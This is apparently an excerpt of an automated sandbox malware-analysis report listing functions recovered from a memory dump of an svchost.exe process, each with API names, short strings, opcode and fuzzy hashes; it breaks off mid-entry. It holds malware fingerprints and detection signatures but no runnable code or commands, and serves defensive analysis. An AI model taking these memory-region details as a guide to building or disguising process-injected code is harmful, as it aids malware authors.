                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                                                            • String ID: C:\Windows\System32\svchost.exe
                                                                                                                                                                                            • API String ID: 3168794593-3822071397
                                                                                                                                                                                            • Opcode ID: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction ID: 7b2007786b8e460b5619866e1bd1f3d06a457a48499f5e3238269ed7f93cb977
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: F1316DB7D49AC7AAF3518BB598653B92BE0F789FC1F0D8035DA8423647EE3588048B44
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction ID: 9a3b840efcda1e7db93577626eb1b458faec38b6ac035d840a373b3d1de39f8b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 78117C3034628762FA64A73596453FA22C27B84BFCF148738E936477EBDEB884118F00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction ID: 055838f8b3643913c36cabf8b6327b8892d5bb23e43e772f23c9291743d5a066
                                                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 24012931B01B82A2EB54DB52E8587AA63E5F788BC5F888035DE4A53755DF3CC989CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0436C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction ID: 33070d977eda5e55a8899d995c6e29835c19bb2840999ec65b223f65280b1878
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82012975B12B43A2FB249B26E8583BA63E0BB49BDAF084434CD4917765EF3DC5588B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A049005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction ID: f6ef8958e4ff09da7609d6c292c7022f0f77416a837a98440a82bacbb7f3169b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0651AB32702A03AAEB54DBA5E848BA937D6F344BCCF14C134DA1667798EF75D881CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A048FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction ID: 0a306b352e9c136140c6eabb1d99a80180b650a4623cf8f7eacfd7b9668d1d4b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E318D31602A42A6E714DF61E8487A93BE5F344BC8F15C034EE5627799DF39C940CB04
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A041A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                            • String ID: \\?\
                                                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction ID: ca23182198d79bffcb3586fd3bb0f4fe69ea8b364f329f4be71edd0ec16f77f1
                                                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F04F32704683A2FB60CB61F8947AA67A1F748BC9F888031DA4946954DF3CC68DCF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A043044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction ID: cb32bd6d1b32a6d1c726aa4e2a6edb57bbb75cffb63054a07ae04fa31d031993
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EF05874B04B87A2EB448B12F9182A966A0BB48FD0F089131EE4A17B18DE38C4858B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction ID: d8780c668946ee17fc1f2d49483dc022331935b9f38912bbe84e5c43b6bad857
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: D1F09071712B07A1EB108F24E8443BA63E1FB89BE5F584639DA6A462E4DF3CC048CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0450D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                                                            • Instruction ID: fdb0b102763467463c9570359a42aafd6ac3e079c7c4036db4c5d621e31afbfc
                                                                                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C02A932619B8696E760CB59E4903AAB7A0F3C57D8F105025EACE87B69DF7DD844CF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A045710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                                                            • Instruction ID: 74ae79a99f340c628abc8e80b890a3081c29e169cba8cc8d5efa1f0722f726f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                                                            • Instruction Fuzzy Hash: BF61B73651AB46D6E6608B55F48036AB7E0F3887C8F105129EACD87BA9DF7CD844CF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A023504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction ID: df317223171f33c51b2129ac6b5e07f089d837312cb6bcf355b7189f993b553a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F117332E14B6331FA661528E45A3F911C16B983F4F988639E96E066D6CF34C8815F02
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A054104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction ID: b57531cd4916b95dc94ad68ba2d3ee2678e903ea359a1f37a6f17705f33d2c0c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction Fuzzy Hash: E2117332E90A5331F6681568D4553F911D3BBB83F8F190634E9762F6D6DE36C8414B08
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A01F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                                                            • Instruction ID: cdad248cea001231995a9b25edf90112c8682fda75076e337906bcfa75f6f25e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D61E036604243A2FA6A9B68E5443FE6AE1F7857C0F54453BDA0A077A5DFB8C841CF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction ID: 4890ffe1d77410b327fb2b3f54df1d16fb02e11cfbb96bfbe7908642242dc32c
                                                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2961483260AB869AEB209F65D4803ED77E1F348BDCF048225EE4917B99DF38C595CB44
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A01A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction ID: 18422d03edeb7ca2c326a9d24e45cd3f00817ee72972fb9937f1f11f0b6c828a
                                                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 84516932108683EAEB648B6595843F977E0F355BD8F188226EA9987BD5CF38D491CF01
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction ID: d24600b219a8fcd24b4a19e418fce7e688bd0d3aa984e486b0ef61f49c403997
                                                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: D1517E7210A683AAEB648F5695843A977E0F354BCDF14C135EA9947BD5CF38D4A0CF08
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A018405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction ID: 76e72031aa41b0f40367b3f9a6e73264907eb4284befd83754da4dab664b2421
                                                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5518732B01603ABEB158F25E444BF937E6F354BD8F548135EA4643788EF34DA89AB04
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction ID: 56c22439610497800de41e700b5302e2d165885c6cbf0350b453c13266eaafe8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction Fuzzy Hash: 86316732601742A7E725DF22E844BE977E4F344BD8F558028EE9A07788DF38DA48DB04
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A052058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction ID: 841438fcb55f65931e452b8dc1eb2018649b99708d8cd29f6b738d349a144d96
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73D1D032B15A82A9E711CFA9D4403EC3BF5F7587D8F148226DE59A7B99DE34C406CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A052980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction ID: 167dba6e9454c6376f8e506a90678331151af30df75b07118807e3492358aae8
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 89918072B10657A5F7649F6594903FD3BE0BB59BC8F184129DE0A77A95DF34C482CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A047960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
